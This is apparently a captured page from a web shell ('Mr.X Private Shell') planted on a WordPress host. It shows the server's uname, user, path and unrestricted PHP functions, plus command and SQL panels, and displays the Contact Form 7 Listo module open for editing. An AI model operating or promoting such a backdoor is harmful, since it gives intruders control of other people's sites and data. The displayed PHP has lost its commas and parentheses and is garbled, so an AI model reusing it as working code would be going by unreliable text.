Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www///wp-content/plugins/contact-form-7/modules/      ( Reset | Go to )
File Name: listo.php
Edit
<?php
/**
** Retrieve list data from the Listo plugin.
** Listo http://wordpress.org/plugins/listo/
**/

add_filter'wpcf7_form_tag_data_option''wpcf7_listo'10);

function 
wpcf7_listo$data$options$args ) {
    if ( ! 
function_exists'listo' ) ) {
        return 
$data;
    }

    
$args wp_parse_args$args, array() );

    
$contact_form wpcf7_get_current_contact_form();
    
$args['locale'] = $contact_form->locale();

    foreach ( (array) 
$options as $option ) {
        
$option explode'.'$option );
        
$type $option[0];

        if ( isset( 
$option[1] ) ) {
            
$args['group'] = $option[1];
        } else {
            unset( 
$args['group'] );
        }

        if ( 
$list listo$type$args ) ) {
            
$data array_merge( (array) $data$list );
        }
    }

    return 
$data;
}

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL